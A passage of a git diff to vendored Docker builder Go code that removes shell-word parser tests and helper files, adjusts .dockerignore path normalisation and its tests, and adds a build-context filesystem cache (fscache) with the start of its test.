-func TestShellParser4EnvVars(t *testing.T) {
-	fn := "envVarTest"
-	lineCount := 0
-
-	file, err := os.Open(fn)
-	if err != nil {
-		t.Fatalf("Can't open '%s': %s", err, fn)
-	}
-	defer file.Close()
-
-	scanner := bufio.NewScanner(file)
-	envs := []string{"PWD=/home", "SHELL=bash", "KOREAN=한국어"}
-	for scanner.Scan() {
-		line := scanner.Text()
-		lineCount++
-
-		// Trim comments and blank lines
-		i := strings.Index(line, "#")
-		if i >= 0 {
-			line = line[:i]
-		}
-		line = strings.TrimSpace(line)
-
-		if line == "" {
-			continue
-		}
-
-		words := strings.Split(line, "|")
-		if len(words) != 3 {
-			t.Fatalf("Error in '%s' - should be exactly one | in:%q", fn, line)
-		}
-
-		words[0] = strings.TrimSpace(words[0])
-		words[1] = strings.TrimSpace(words[1])
-		words[2] = strings.TrimSpace(words[2])
-
-		// Key W=Windows; A=All; U=Unix
-		if (words[0] != "W") && (words[0] != "A") && (words[0] != "U") {
-			t.Fatalf("Invalid tag %s at line %d of %s. Must be W, A or U", words[0], lineCount, fn)
-		}
-
-		if ((words[0] == "W" || words[0] == "A") && runtime.GOOS == "windows") ||
-			((words[0] == "U" || words[0] == "A") && runtime.GOOS != "windows") {
-			newWord, err := ProcessWord(words[1], envs, '\\')
-
-			if err != nil {
-				newWord = "error"
-			}
-
-			if newWord != words[2] {
-				t.Fatalf("Error. Src: %s  Calc: %s  Expected: %s at line %d", words[1], newWord, words[2], lineCount)
-			}
-		}
-	}
-}
-
-func TestShellParser4Words(t *testing.T) {
-	fn := "wordsTest"
-
-	file, err := os.Open(fn)
-	if err != nil {
-		t.Fatalf("Can't open '%s': %s", err, fn)
-	}
-	defer file.Close()
-
-	envs := []string{}
-	scanner := bufio.NewScanner(file)
-	for scanner.Scan() {
-		line := scanner.Text()
-
-		if strings.HasPrefix(line, "#") {
-			continue
-		}
-
-		if strings.HasPrefix(line, "ENV ") {
-			line = strings.TrimLeft(line[3:], " ")
-			envs = append(envs, line)
-			continue
-		}
-
-		words := strings.Split(line, "|")
-		if len(words) != 2 {
-			t.Fatalf("Error in '%s' - should be exactly one | in: %q", fn, line)
-		}
-		test := strings.TrimSpace(words[0])
-		expected := strings.Split(strings.TrimLeft(words[1], " "), ",")
-
-		result, err := ProcessWords(test, envs, '\\')
-
-		if err != nil {
-			result = []string{"error"}
-		}
-
-		if len(result) != len(expected) {
-			t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result)
-		}
-		for i, w := range expected {
-			if w != result[i] {
-				t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result)
-			}
-		}
-	}
-}
-
-func TestGetEnv(t *testing.T) {
-	sw := &shellWord{
-		word: "",
-		envs: nil,
-		pos:  0,
-	}
-
-	sw.envs = []string{}
-	if sw.getEnv("foo") != "" {
-		t.Fatalf("2 - 'foo' should map to ''")
-	}
-
-	sw.envs = []string{"foo"}
-	if sw.getEnv("foo") != "" {
-		t.Fatalf("3 - 'foo' should map to ''")
-	}
-
-	sw.envs = []string{"foo="}
-	if sw.getEnv("foo") != "" {
-		t.Fatalf("4 - 'foo' should map to ''")
-	}
-
-	sw.envs = []string{"foo=bar"}
-	if sw.getEnv("foo") != "bar" {
-		t.Fatalf("5 - 'foo' should map to 'bar'")
-	}
-
-	sw.envs = []string{"foo=bar", "car=hat"}
-	if sw.getEnv("foo") != "bar" {
-		t.Fatalf("6 - 'foo' should map to 'bar'")
-	}
-	if sw.getEnv("car") != "hat" {
-		t.Fatalf("7 - 'car' should map to 'hat'")
-	}
-
-	// Make sure we grab the first 'car' in the list
-	sw.envs = []string{"foo=bar", "car=hat", "car=bike"}
-	if sw.getEnv("car") != "hat" {
-		t.Fatalf("8 - 'car' should map to 'hat'")
-	}
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support.go b/vendor/github.com/docker/docker/builder/dockerfile/support.go
deleted file mode 100644
index e87588910b..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/support.go
+++ /dev/null
@@ -1,19 +0,0 @@
-package dockerfile
-
-import "strings"
-
-// handleJSONArgs parses command passed to CMD, ENTRYPOINT, RUN and SHELL instruction in Dockerfile
-// for exec form it returns untouched args slice
-// for shell form it returns concatenated args as the first element of a slice
-func handleJSONArgs(args []string, attributes map[string]bool) []string {
-	if len(args) == 0 {
-		return []string{}
-	}
-
-	if attributes != nil && attributes["json"] {
-		return args
-	}
-
-	// literal string command, not an exec array
-	return []string{strings.Join(args, " ")}
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go
deleted file mode 100644
index 7cc6fe9dcb..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go
+++ /dev/null
@@ -1,65 +0,0 @@
-package dockerfile
-
-import "testing"
-
-type testCase struct {
-	name       string
-	args       []string
-	attributes map[string]bool
-	expected   []string
-}
-
-func initTestCases() []testCase {
-	testCases := []testCase{}
-
-	testCases = append(testCases, testCase{
-		name:       "empty args",
-		args:       []string{},
-		attributes: make(map[string]bool),
-		expected:   []string{},
-	})
-
-	jsonAttributes := make(map[string]bool)
-	jsonAttributes["json"] = true
-
-	testCases = append(testCases, testCase{
-		name:       "json attribute with one element",
-		args:       []string{"foo"},
-		attributes: jsonAttributes,
-		expected:   []string{"foo"},
-	})
-
-	testCases = append(testCases, testCase{
-		name:       "json attribute with two elements",
-		args:       []string{"foo", "bar"},
-		attributes: jsonAttributes,
-		expected:   []string{"foo", "bar"},
-	})
-
-	testCases = append(testCases, testCase{
-		name:       "no attributes",
-		args:       []string{"foo", "bar"},
-		attributes: nil,
-		expected:   []string{"foo bar"},
-	})
-
-	return testCases
-}
-
-func TestHandleJSONArgs(t *testing.T) {
-	testCases := initTestCases()
-
-	for _, test := range testCases {
-		arguments := handleJSONArgs(test.args, test.attributes)
-
-		if len(arguments) != len(test.expected) {
-			t.Fatalf("In test \"%s\": length of returned slice is incorrect. Expected: %d, got: %d", test.name, len(test.expected), len(arguments))
-		}
-
-		for i := range test.expected {
-			if arguments[i] != test.expected[i] {
-				t.Fatalf("In test \"%s\": element as position %d is incorrect. Expected: %s, got: %s", test.name, i, test.expected[i], arguments[i])
-			}
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go
index 80a3f1babf..3d615f3460 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go
@@ -1,4 +1,4 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest
deleted file mode 100644
index fa916c67f9..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest
+++ /dev/null
@@ -1,25 +0,0 @@
-hello | hello
-hello${hi}bye | hellobye
-ENV hi=hi
-hello${hi}bye | hellohibye
-ENV space=abc  def
-hello${space}bye | helloabc,defbye
-hello"${space}"bye | helloabc  defbye
-hello "${space}"bye | hello,abc  defbye
-ENV leading=  ab c
-hello${leading}def | hello,ab,cdef
-hello"${leading}" def | hello  ab c,def
-hello"${leading}" | hello  ab c
-hello${leading} | hello,ab,c
-# next line MUST have 3 trailing spaces, don't erase them!
-ENV trailing=ab c   
-hello${trailing} | helloab,c
-hello${trailing}d | helloab,c,d
-hello"${trailing}"d | helloab c   d
-# next line MUST have 3 trailing spaces, don't erase them!
-hel"lo${trailing}" | helloab c   
-hello" there  " | hello there  
-hello there     | hello,there
-hello\ there | hello there
-hello" there | hello there
-hello\" there | hello",there
diff --git a/vendor/github.com/docker/docker/builder/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore.go
deleted file mode 100644
index 3da7913367..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerignore.go
+++ /dev/null
@@ -1,48 +0,0 @@
-package builder
-
-import (
-	"os"
-
-	"github.com/docker/docker/builder/dockerignore"
-	"github.com/docker/docker/pkg/fileutils"
-)
-
-// DockerIgnoreContext wraps a ModifiableContext to add a method
-// for handling the .dockerignore file at the root of the context.
-type DockerIgnoreContext struct {
-	ModifiableContext
-}
-
-// Process reads the .dockerignore file at the root of the embedded context.
-// If .dockerignore does not exist in the context, then nil is returned.
-//
-// It can take a list of files to be removed after .dockerignore is removed.
-// This is used for server-side implementations of builders that need to send
-// the .dockerignore file as well as the special files specified in filesToRemove,
-// but expect them to be excluded from the context after they were processed.
-//
-// For example, server-side Dockerfile builders are expected to pass in the name
-// of the Dockerfile to be removed after it was parsed.
-//
-// TODO: Don't require a ModifiableContext (use Context instead) and don't remove
-// files, instead handle a list of files to be excluded from the context.
-func (c DockerIgnoreContext) Process(filesToRemove []string) error {
-	f, err := c.Open(".dockerignore")
-	// Note that a missing .dockerignore file isn't treated as an error
-	if err != nil {
-		if os.IsNotExist(err) {
-			return nil
-		}
-		return err
-	}
-	excludes, _ := dockerignore.ReadAll(f)
-	f.Close()
-	filesToRemove = append([]string{".dockerignore"}, filesToRemove...)
-	for _, fileToRemove := range filesToRemove {
-		rm, _ := fileutils.Matches(fileToRemove, excludes)
-		if rm {
-			c.Remove(fileToRemove)
-		}
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go
index 2db67be799..57f224afc8 100644
--- a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go
+++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go
@@ -1,4 +1,4 @@
-package dockerignore
+package dockerignore // import "github.com/docker/docker/builder/dockerignore"
 
 import (
 	"bufio"
@@ -38,8 +38,23 @@ func ReadAll(reader io.Reader) ([]string, error) {
 		if pattern == "" {
 			continue
 		}
-		pattern = filepath.Clean(pattern)
-		pattern = filepath.ToSlash(pattern)
+		// normalize absolute paths to paths relative to the context
+		// (taking care of '!' prefix)
+		invert := pattern[0] == '!'
+		if invert {
+			pattern = strings.TrimSpace(pattern[1:])
+		}
+		if len(pattern) > 0 {
+			pattern = filepath.Clean(pattern)
+			pattern = filepath.ToSlash(pattern)
+			if len(pattern) > 1 && pattern[0] == '/' {
+				pattern = pattern[1:]
+			}
+		}
+		if invert {
+			pattern = "!" + pattern
+		}
+
 		excludes = append(excludes, pattern)
 	}
 	if err := scanner.Err(); err != nil {
diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go
index 612a1399cd..06186cc120 100644
--- a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go
+++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go
@@ -1,4 +1,4 @@
-package dockerignore
+package dockerignore // import "github.com/docker/docker/builder/dockerignore"
 
 import (
 	"fmt"
@@ -25,7 +25,7 @@ func TestReadAll(t *testing.T) {
 	}
 
 	diName := filepath.Join(tmpDir, ".dockerignore")
-	content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile")
+	content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile\n# this is a comment\n! /inverted/abs/path\n!\n! \n")
 	err = ioutil.WriteFile(diName, []byte(content), 0777)
 	if err != nil {
 		t.Fatal(err)
@@ -42,16 +42,28 @@ func TestReadAll(t *testing.T) {
 		t.Fatal(err)
 	}
 
+	if len(di) != 7 {
+		t.Fatalf("Expected 5 entries, got %v", len(di))
+	}
 	if di[0] != "test1" {
-		t.Fatalf("First element is not test1")
+		t.Fatal("First element is not test1")
 	}
-	if di[1] != "/test2" {
-		t.Fatalf("Second element is not /test2")
+	if di[1] != "test2" { // according to https://docs.docker.com/engine/reference/builder/#dockerignore-file, /foo/bar should be treated as foo/bar
+		t.Fatal("Second element is not test2")
 	}
-	if di[2] != "/a/file/here" {
-		t.Fatalf("Third element is not /a/file/here")
+	if di[2] != "a/file/here" { // according to https://docs.docker.com/engine/reference/builder/#dockerignore-file, /foo/bar should be treated as foo/bar
+		t.Fatal("Third element is not a/file/here")
 	}
 	if di[3] != "lastfile" {
-		t.Fatalf("Fourth element is not lastfile")
+		t.Fatal("Fourth element is not lastfile")
+	}
+	if di[4] != "!inverted/abs/path" {
+		t.Fatal("Fifth element is not !inverted/abs/path")
+	}
+	if di[5] != "!" {
+		t.Fatalf("Sixth element is not !, but %s", di[5])
+	}
+	if di[6] != "!" {
+		t.Fatalf("Sixth element is not !, but %s", di[6])
 	}
 }
diff --git a/vendor/github.com/docker/docker/builder/fscache/fscache.go b/vendor/github.com/docker/docker/builder/fscache/fscache.go
new file mode 100644
index 0000000000..92c3ea4adb
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/fscache/fscache.go
@@ -0,0 +1,652 @@
+package fscache // import "github.com/docker/docker/builder/fscache"
+
+import (
+	"archive/tar"
+	"context"
+	"crypto/sha256"
+	"encoding/json"
+	"hash"
+	"os"
+	"path/filepath"
+	"sort"
+	"sync"
+	"time"
+
+	"github.com/boltdb/bolt"
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/remotecontext"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/directory"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/tarsum"
+	"github.com/moby/buildkit/session/filesync"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"github.com/tonistiigi/fsutil"
+	"golang.org/x/sync/singleflight"
+)
+
+const dbFile = "fscache.db"
+const cacheKey = "cache"
+const metaKey = "meta"
+
+// Backend is a backing implementation for FSCache
+type Backend interface {
+	Get(id string) (string, error)
+	Remove(id string) error
+}
+
+// FSCache allows syncing remote resources to cached snapshots
+type FSCache struct {
+	opt        Opt
+	transports map[string]Transport
+	mu         sync.Mutex
+	g          singleflight.Group
+	store      *fsCacheStore
+}
+
+// Opt defines options for initializing FSCache
+type Opt struct {
+	Backend  Backend
+	Root     string // for storing local metadata
+	GCPolicy GCPolicy
+}
+
+// GCPolicy defines policy for garbage collection
+type GCPolicy struct {
+	MaxSize         uint64
+	MaxKeepDuration time.Duration
+}
+
+// NewFSCache returns new FSCache object
+func NewFSCache(opt Opt) (*FSCache, error) {
+	store, err := newFSCacheStore(opt)
+	if err != nil {
+		return nil, err
+	}
+	return &FSCache{
+		store:      store,
+		opt:        opt,
+		transports: make(map[string]Transport),
+	}, nil
+}
+
+// Transport defines a method for syncing remote data to FSCache
+type Transport interface {
+	Copy(ctx context.Context, id RemoteIdentifier, dest string, cs filesync.CacheUpdater) error
+}
+
+// RemoteIdentifier identifies a transfer request
+type RemoteIdentifier interface {
+	Key() string
+	SharedKey() string
+	Transport() string
+}
+
+// RegisterTransport registers a new transport method
+func (fsc *FSCache) RegisterTransport(id string, transport Transport) error {
+	fsc.mu.Lock()
+	defer fsc.mu.Unlock()
+	if _, ok := fsc.transports[id]; ok {
+		return errors.Errorf("transport %v already exists", id)
+	}
+	fsc.transports[id] = transport
+	return nil
+}
+
+// SyncFrom returns a source based on a remote identifier
+func (fsc *FSCache) SyncFrom(ctx context.Context, id RemoteIdentifier) (builder.Source, error) { // cacheOpt
+	trasportID := id.Transport()
+	fsc.mu.Lock()
+	transport, ok := fsc.transports[id.Transport()]
+	if !ok {
+		fsc.mu.Unlock()
+		return nil, errors.Errorf("invalid transport %s", trasportID)
+	}
+
+	logrus.Debugf("SyncFrom %s %s", id.Key(), id.SharedKey())
+	fsc.mu.Unlock()
+	sourceRef, err, _ := fsc.g.Do(id.Key(), func() (interface{}, error) {
+		var sourceRef *cachedSourceRef
+		sourceRef, err := fsc.store.Get(id.Key())
+		if err == nil {
+			return sourceRef, nil
+		}
+
+		// check for unused shared cache
+		sharedKey := id.SharedKey()
+		if sharedKey != "" {
+			r, err := fsc.store.Rebase(sharedKey, id.Key())
+			if err == nil {
+				sourceRef = r
+			}
+		}
+
+		if sourceRef == nil {
+			var err error
+			sourceRef, err = fsc.store.New(id.Key(), sharedKey)
+			if err != nil {
+				return nil, errors.Wrap(err, "failed to create remote context")
+			}
+		}
+
+		if err := syncFrom(ctx, sourceRef, transport, id); err != nil {
+			sourceRef.Release()
+			return nil, err
+		}
+		if err := sourceRef.resetSize(-1); err != nil {
+			return nil, err
+		}
+		return sourceRef, nil
+	})
+	if err != nil {
+		return nil, err
+	}
+	ref := sourceRef.(*cachedSourceRef)
+	if ref.src == nil { // failsafe
+		return nil, errors.Errorf("invalid empty pull")
+	}
+	wc := &wrappedContext{Source: ref.src, closer: func() error {
+		ref.Release()
+		return nil
+	}}
+	return wc, nil
+}
+
+// DiskUsage reports how much data is allocated by the cache
+func (fsc *FSCache) DiskUsage(ctx context.Context) (int64, error) {
+	return fsc.store.DiskUsage(ctx)
+}
+
+// Prune allows manually cleaning up the cache
+func (fsc *FSCache) Prune(ctx context.Context) (uint64, error) {
+	return fsc.store.Prune(ctx)
+}
+
+// Close stops the gc and closes the persistent db
+func (fsc *FSCache) Close() error {
+	return fsc.store.Close()
+}
+
+func syncFrom(ctx context.Context, cs *cachedSourceRef, transport Transport, id RemoteIdentifier) (retErr error) {
+	src := cs.src
+	if src == nil {
+		src = remotecontext.NewCachableSource(cs.Dir())
+	}
+
+	if !cs.cached {
+		if err := cs.storage.db.View(func(tx *bolt.Tx) error {
+			b := tx.Bucket([]byte(id.Key()))
+			dt := b.Get([]byte(cacheKey))
+			if dt != nil {
+				if err := src.UnmarshalBinary(dt); err != nil {
+					return err
+				}
+			} else {
+				return errors.Wrap(src.Scan(), "failed to scan cache records")
+			}
+			return nil
+		}); err != nil {
+			return err
+		}
+	}
+
+	dc := &detectChanges{f: src.HandleChange}
+
+	// todo: probably send a bucket to `Copy` and let it return source
+	// but need to make sure that tx is safe
+	if err := transport.Copy(ctx, id, cs.Dir(), dc); err != nil {
+		return errors.Wrapf(err, "failed to copy to %s", cs.Dir())
+	}
+
+	if !dc.supported {
+		if err := src.Scan(); err != nil {
+			return errors.Wrap(err, "failed to scan cache records after transfer")
+		}
+	}
+	cs.cached = true
+	cs.src = src
+	return cs.storage.db.Update(func(tx *bolt.Tx) error {
+		dt, err := src.MarshalBinary()
+		if err != nil {
+			return err
+		}
+		b := tx.Bucket([]byte(id.Key()))
+		return b.Put([]byte(cacheKey), dt)
+	})
+}
+
+type fsCacheStore struct {
+	mu       sync.Mutex
+	sources  map[string]*cachedSource
+	db       *bolt.DB
+	fs       Backend
+	gcTimer  *time.Timer
+	gcPolicy GCPolicy
+}
+
+// CachePolicy defines policy for keeping a resource in cache
+type CachePolicy struct {
+	Priority int
+	LastUsed time.Time
+}
+
+func defaultCachePolicy() CachePolicy {
+	return CachePolicy{Priority: 10, LastUsed: time.Now()}
+}
+
+func newFSCacheStore(opt Opt) (*fsCacheStore, error) {
+	if err := os.MkdirAll(opt.Root, 0700); err != nil {
+		return nil, err
+	}
+	p := filepath.Join(opt.Root, dbFile)
+	db, err := bolt.Open(p, 0600, nil)
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to open database file %s")
+	}
+	s := &fsCacheStore{db: db, sources: make(map[string]*cachedSource), fs: opt.Backend, gcPolicy: opt.GCPolicy}
+	db.View(func(tx *bolt.Tx) error {
+		return tx.ForEach(func(name []byte, b *bolt.Bucket) error {
+			dt := b.Get([]byte(metaKey))
+			if dt == nil {
+				return nil
+			}
+			var sm sourceMeta
+			if err := json.Unmarshal(dt, &sm); err != nil {
+				return err
+			}
+			dir, err := s.fs.Get(sm.BackendID)
+			if err != nil {
+				return err // TODO: handle gracefully
+			}
+			source := &cachedSource{
+				refs:       make(map[*cachedSourceRef]struct{}),
+				id:         string(name),
+				dir:        dir,
+				sourceMeta: sm,
+				storage:    s,
+			}
+			s.sources[string(name)] = source
+			return nil
+		})
+	})
+
+	s.gcTimer = s.startPeriodicGC(5 * time.Minute)
+	return s, nil
+}
+
+func (s *fsCacheStore) startPeriodicGC(interval time.Duration) *time.Timer {
+	var t *time.Timer
+	t = time.AfterFunc(interval, func() {
+		if err := s.GC(); err != nil {
+			logrus.Errorf("build gc error: %v", err)
+		}
+		t.Reset(interval)
+	})
+	return t
+}
+
+func (s *fsCacheStore) Close() error {
+	s.gcTimer.Stop()
+	return s.db.Close()
+}
+
+func (s *fsCacheStore) New(id, sharedKey string) (*cachedSourceRef, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	var ret *cachedSource
+	if err := s.db.Update(func(tx *bolt.Tx) error {
+		b, err := tx.CreateBucket([]byte(id))
+		if err != nil {
+			return err
+		}
+		backendID := stringid.GenerateRandomID()
+		dir, err := s.fs.Get(backendID)
+		if err != nil {
+			return err
+		}
+		source := &cachedSource{
+			refs: make(map[*cachedSourceRef]struct{}),
+			id:   id,
+			dir:  dir,
+			sourceMeta: sourceMeta{
+				BackendID:   backendID,
+				SharedKey:   sharedKey,
+				CachePolicy: defaultCachePolicy(),
+			},
+			storage: s,
+		}
+		dt, err := json.Marshal(source.sourceMeta)
+		if err != nil {
+			return err
+		}
+		if err := b.Put([]byte(metaKey), dt); err != nil {
+			return err
+		}
+		s.sources[id] = source
+		ret = source
+		return nil
+	}); err != nil {
+		return nil, err
+	}
+	return ret.getRef(), nil
+}
+
+func (s *fsCacheStore) Rebase(sharedKey, newid string) (*cachedSourceRef, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	var ret *cachedSource
+	for id, snap := range s.sources {
+		if snap.SharedKey == sharedKey && len(snap.refs) == 0 {
+			if err := s.db.Update(func(tx *bolt.Tx) error {
+				if err := tx.DeleteBucket([]byte(id)); err != nil {
+					return err
+				}
+				b, err := tx.CreateBucket([]byte(newid))
+				if err != nil {
+					return err
+				}
+				snap.id = newid
+				snap.CachePolicy = defaultCachePolicy()
+				dt, err := json.Marshal(snap.sourceMeta)
+				if err != nil {
+					return err
+				}
+				if err := b.Put([]byte(metaKey), dt); err != nil {
+					return err
+				}
+				delete(s.sources, id)
+				s.sources[newid] = snap
+				return nil
+			}); err != nil {
+				return nil, err
+			}
+			ret = snap
+			break
+		}
+	}
+	if ret == nil {
+		return nil, errors.Errorf("no candidate for rebase")
+	}
+	return ret.getRef(), nil
+}
+
+func (s *fsCacheStore) Get(id string) (*cachedSourceRef, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	src, ok := s.sources[id]
+	if !ok {
+		return nil, errors.Errorf("not found")
+	}
+	return src.getRef(), nil
+}
+
+// DiskUsage reports how much data is allocated by the cache
+func (s *fsCacheStore) DiskUsage(ctx context.Context) (int64, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	var size int64
+
+	for _, snap := range s.sources {
+		if len(snap.refs) == 0 {
+			ss, err := snap.getSize(ctx)
+			if err != nil {
+				return 0, err
+			}
+			size += ss
+		}
+	}
+	return size, nil
+}
+
+// Prune allows manually cleaning up the cache
+func (s *fsCacheStore) Prune(ctx context.Context) (uint64, error) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	var size uint64
+
+	for id, snap := range s.sources {
+		select {
+		case <-ctx.Done():
+			logrus.Debugf("Cache prune operation cancelled, pruned size: %d", size)
+			// when the context is cancelled, only return current size and nil
+			return size, nil
+		default:
+		}
+		if len(snap.refs) == 0 {
+			ss, err := snap.getSize(ctx)
+			if err != nil {
+				return size, err
+			}
+			if err := s.delete(id); err != nil {
+				return size, errors.Wrapf(err, "failed to delete %s", id)
+			}
+			size += uint64(ss)
+		}
+	}
+	return size, nil
+}
+
+// GC runs a garbage collector on FSCache
+func (s *fsCacheStore) GC() error {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	var size uint64
+
+	ctx := context.Background()
+	cutoff := time.Now().Add(-s.gcPolicy.MaxKeepDuration)
+	var blacklist []*cachedSource
+
+	for id, snap := range s.sources {
+		if len(snap.refs) == 0 {
+			if cutoff.After(snap.CachePolicy.LastUsed) {
+				if err := s.delete(id); err != nil {
+					return errors.Wrapf(err, "failed to delete %s", id)
+				}
+			} else {
+				ss, err := snap.getSize(ctx)
+				if err != nil {
+					return err
+				}
+				size += uint64(ss)
+				blacklist = append(blacklist, snap)
+			}
+		}
+	}
+
+	sort.Sort(sortableCacheSources(blacklist))
+	for _, snap := range blacklist {
+		if size <= s.gcPolicy.MaxSize {
+			break
+		}
+		ss, err := snap.getSize(ctx)
+		if err != nil {
+			return err
+		}
+		if err := s.delete(snap.id); err != nil {
+			return errors.Wrapf(err, "failed to delete %s", snap.id)
+		}
+		size -= uint64(ss)
+	}
+	return nil
+}
+
+// keep mu while calling this
+func (s *fsCacheStore) delete(id string) error {
+	src, ok := s.sources[id]
+	if !ok {
+		return nil
+	}
+	if len(src.refs) > 0 {
+		return errors.Errorf("can't delete %s because it has active references", id)
+	}
+	delete(s.sources, id)
+	if err := s.db.Update(func(tx *bolt.Tx) error {
+		return tx.DeleteBucket([]byte(id))
+	}); err != nil {
+		return err
+	}
+	return s.fs.Remove(src.BackendID)
+}
+
+type sourceMeta struct {
+	SharedKey   string
+	BackendID   string
+	CachePolicy CachePolicy
+	Size        int64
+}
+
+type cachedSource struct {
+	sourceMeta
+	refs    map[*cachedSourceRef]struct{}
+	id      string
+	dir     string
+	src     *remotecontext.CachableSource
+	storage *fsCacheStore
+	cached  bool // keep track if cache is up to date
+}
+
+type cachedSourceRef struct {
+	*cachedSource
+}
+
+func (cs *cachedSource) Dir() string {
+	return cs.dir
+}
+
+// hold storage lock before calling
+func (cs *cachedSource) getRef() *cachedSourceRef {
+	ref := &cachedSourceRef{cachedSource: cs}
+	cs.refs[ref] = struct{}{}
+	return ref
+}
+
+// hold storage lock before calling
+func (cs *cachedSource) getSize(ctx context.Context) (int64, error) {
+	if cs.sourceMeta.Size < 0 {
+		ss, err := directory.Size(ctx, cs.dir)
+		if err != nil {
+			return 0, err
+		}
+		if err := cs.resetSize(ss); err != nil {
+			return 0, err
+		}
+		return ss, nil
+	}
+	return cs.sourceMeta.Size, nil
+}
+
+func (cs *cachedSource) resetSize(val int64) error {
+	cs.sourceMeta.Size = val
+	return cs.saveMeta()
+}
+func (cs *cachedSource) saveMeta() error {
+	return cs.storage.db.Update(func(tx *bolt.Tx) error {
+		b := tx.Bucket([]byte(cs.id))
+		dt, err := json.Marshal(cs.sourceMeta)
+		if err != nil {
+			return err
+		}
+		return b.Put([]byte(metaKey), dt)
+	})
+}
+
+func (csr *cachedSourceRef) Release() error {
+	csr.cachedSource.storage.mu.Lock()
+	defer csr.cachedSource.storage.mu.Unlock()
+	delete(csr.cachedSource.refs, csr)
+	if len(csr.cachedSource.refs) == 0 {
+		go csr.cachedSource.storage.GC()
+	}
+	return nil
+}
+
+type detectChanges struct {
+	f         fsutil.ChangeFunc
+	supported bool
+}
+
+func (dc *detectChanges) HandleChange(kind fsutil.ChangeKind, path string, fi os.FileInfo, err error) error {
+	if dc == nil {
+		return nil
+	}
+	return dc.f(kind, path, fi, err)
+}
+
+func (dc *detectChanges) MarkSupported(v bool) {
+	if dc == nil {
+		return
+	}
+	dc.supported = v
+}
+
+func (dc *detectChanges) ContentHasher() fsutil.ContentHasher {
+	return newTarsumHash
+}
+
+type wrappedContext struct {
+	builder.Source
+	closer func() error
+}
+
+func (wc *wrappedContext) Close() error {
+	if err := wc.Source.Close(); err != nil {
+		return err
+	}
+	return wc.closer()
+}
+
+type sortableCacheSources []*cachedSource
+
+// Len is the number of elements in the collection.
+func (s sortableCacheSources) Len() int {
+	return len(s)
+}
+
+// Less reports whether the element with
+// index i should sort before the element with index j.
+func (s sortableCacheSources) Less(i, j int) bool {
+	return s[i].CachePolicy.LastUsed.Before(s[j].CachePolicy.LastUsed)
+}
+
+// Swap swaps the elements with indexes i and j.
+func (s sortableCacheSources) Swap(i, j int) {
+	s[i], s[j] = s[j], s[i]
+}
+
+func newTarsumHash(stat *fsutil.Stat) (hash.Hash, error) {
+	fi := &fsutil.StatInfo{Stat: stat}
+	p := stat.Path
+	if fi.IsDir() {
+		p += string(os.PathSeparator)
+	}
+	h, err := archive.FileInfoHeader(p, fi, stat.Linkname)
+	if err != nil {
+		return nil, err
+	}
+	h.Name = p
+	h.Uid = int(stat.Uid)
+	h.Gid = int(stat.Gid)
+	h.Linkname = stat.Linkname
+	if stat.Xattrs != nil {
+		h.Xattrs = make(map[string]string)
+		for k, v := range stat.Xattrs {
+			h.Xattrs[k] = string(v)
+		}
+	}
+
+	tsh := &tarsumHash{h: h, Hash: sha256.New()}
+	tsh.Reset()
+	return tsh, nil
+}
+
+// Reset resets the Hash to its initial state.
+func (tsh *tarsumHash) Reset() {
+	tsh.Hash.Reset()
+	tarsum.WriteV1Header(tsh.h, tsh.Hash)
+}
+
+type tarsumHash struct {
+	hash.Hash
+	h *tar.Header
+}
diff --git a/vendor/github.com/docker/docker/builder/fscache/fscache_test.go b/vendor/github.com/docker/docker/builder/fscache/fscache_test.go
new file mode 100644
index 0000000000..5108d65df1
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/fscache/fscache_test.go
@@ -0,0 +1,132 @@
+package fscache // import "github.com/docker/docker/builder/fscache"
+
+import (
+	"context"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+	"time"
+
+	"github.com/moby/buildkit/session/filesync"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestFSCache(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "fscache")
+	assert.Check(t, err)
+	defer os.RemoveAll(tmpDir)
+
+	backend := NewNaiveCacheBackend(filepath.Join(tmpDir, "backend"))
+
+	opt := Opt{
+		Root:     tmpDir,
+		Backend:  backend,
